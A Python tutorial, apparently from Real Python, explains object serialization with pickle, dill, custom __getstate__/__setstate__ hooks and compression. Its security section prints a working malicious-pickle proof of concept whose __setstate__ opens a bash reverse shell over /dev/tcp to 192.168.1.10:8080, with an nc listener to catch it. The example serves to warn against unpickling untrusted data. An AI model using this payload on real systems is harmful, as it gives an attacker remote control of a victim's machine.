Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle
module.
In this tutorial, you’ll learn:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python
pickle
module - How to use the Python
pickle
module to serialize object hierarchies - What the risks are when deserializing an object from an untrusted source
Let’s get pickling!
Free Bonus: 5 Thoughts On Python Mastery, a free course for Python developers that shows you the roadmap and the mindset you’ll need to take your Python skills to the next level.
Serialization in Python
The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three different modules in the standard library that allow you to serialize and deserialize objects:
In addition, Python supports XML, which you can also use to serialize objects.
The marshal
module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc
files you get when the interpreter imports a Python module. So, even though you can use marshal
to serialize some of your objects, it’s not recommended.
The json
module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json
module, you can serialize and deserialize several standard Python types:
The Python pickle
module is another way to serialize and deserialize objects in Python. It differs from the json
module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
Note: From now on, you’ll see the terms pickling and unpickling used to refer to serializing and deserializing with the Python pickle
module.
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
-
Don’t use the
marshal
module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways. -
The
json
module and XML are good choices if you need interoperability with different languages or a human-readable format. -
The Python
pickle
module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go withpickle
.
Inside the Python pickle
Module
The Python pickle
module basically consists of four methods:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between dump()
and dumps()
is that the first creates a file containing the serialization result, whereas the second returns a string.
To differentiate dumps()
from dump()
, it’s helpful to remember that the s
at the end of the function name stands for string
. The same concept also applies to load()
and loads()
: The first one reads a file to start the unpickling process, and the second one operates on a string.
Consider the following example. Say you have a custom-defined class named example_class
with several different attributes, each of a different type:
a_number
a_string
a_dictionary
a_list
a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:
# pickling.py
import pickle
class example_class:
a_number = 35
a_string = "hey"
a_list = [1, 2, 3]
a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
a_tuple = (22, 23)
my_object = example_class()
my_pickled_object = pickle.dumps(my_object) # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")
my_object.a_dict = None
my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object
print(
f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
In the example above, you create several different objects and serialize them with pickle
. This produces a single string with the serialized result:
$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
The pickling process ends correctly, storing your entire instance in this string: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
After the pickling process ends, you modify your original object by setting the attribute a_dict
to None
.
Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began.
Protocol Formats of the Python pickle
Module
As mentioned above, the pickle
module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle
module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols that the Python pickle
module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
- Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
- Protocol version 1 was the first binary format.
- Protocol version 2 was introduced in Python 2.3.
- Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
- Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
- Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.
Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.
To identify the highest protocol that your interpreter supports, you can check the value of the pickle.HIGHEST_PROTOCOL
attribute.
To choose a specific protocol, you need to specify the protocol version when you invoke load()
, loads()
, dump()
or dumps()
. If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL
attribute.
Picklable and Unpicklable Types
You’ve already learned that the Python pickle
module can serialize many more types than the json
module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill
.
The dill
module extends the capabilities of pickle
. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a lambda
function:
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
If you try to run this program, then you will get an exception because the Python pickle
module can’t serialize a lambda
function:
$ python pickling_error.py
Traceback (most recent call last):
File "pickling_error.py", line 6, in <module>
my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
Now try replacing the Python pickle
module with dill
to see if there’s any difference:
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
If you run this code, then you’ll see that the dill
module serializes the lambda
without returning an error:
$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'
Another interesting feature of dill
is that it can even serialize an entire interpreter session. Here’s an example:
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
In this example, you start the interpreter, import a module, and define a lambda
function along with a couple of other variables. You then import the dill
module and invoke dump_session()
to serialize the entire session.
If everything goes okay, then you should get a test.pkl
file in your current directory:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Now you can start a new instance of the interpreter and load the test.pkl
file to restore your last session:
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
The first globals().items()
statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill
module and call load_session()
to restore your serialized interpreter session.
Note: Before you use dill
instead of pickle
, keep in mind that dill
is not included in the standard library of the Python interpreter and is typically slower than pickle
.
Even though dill
lets you serialize a wider range of objects than pickle
, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill
.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.
You can use __getstate__()
to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__()
, then the default instance’s __dict__
will be used.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate()__
:
# custom_pickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
In this example, you create an object with three attributes. Since one attribute is a lambda
, the object is unpicklable with the standard pickle
module.
To address this issue, you specify what to pickle with __getstate__()
. You first clone the entire __dict__
of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c
attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c
attribute:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c
object back to the deserialized instance? You can accomplish this with __setstate__()
:
# custom_unpickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
def __setstate__(self, state):
self.__dict__ = state
self.c = lambda x: x * x
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
By passing the excluded c
object to __setstate__()
, you ensure that it appears in the __dict__
of the unpickled string.
Compression of Pickled Objects
Although the pickle
data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with bzip2
or gzip
.
To compress a pickled string with bzip2
, you can use the bz2
module provided in the standard library.
In the following example, you’ll take a string, pickle it, and then compress it using the bz2
library:
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
When using compression, bear in mind that smaller files come at the cost of a slower process.
Security Concerns With the Python pickle
Module
You now know how to use the pickle
module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Python pickle
module: It’s not secure. Do you remember the discussion of __setstate__()
? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac
to sign the data and ensure it hasn’t been tampered with.
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
# remote.py
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c
"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
In this example, the unpickling process executes __setstate__()
, which executes a Bash command to open a remote shell to the 192.168.1.10
machine on port 8080
.
Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc
command to listen for a connection to port 8080:
$ nc -l 8080
This will be the attacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10
.
By executing this code, the victim will expose a shell to the attacker:
$ python remote.py
If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:
$ nc -l 8080
bash: no job control in this shell
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$
So, let me repeat this critical point once again: Do not use the pickle
module to deserialize objects from untrusted sources!
Conclusion
You now know how to use the Python pickle
module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
In this tutorial, you’ve learned:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python
pickle
module - How to use the Python
pickle
module to serialize object hierarchies - What the risks are of unpickling from an untrusted source
With this knowledge, you’re well equipped to persist your objects using the Python pickle
module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.
If you have any questions, then leave a comment down below or contact me on Twitter!
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module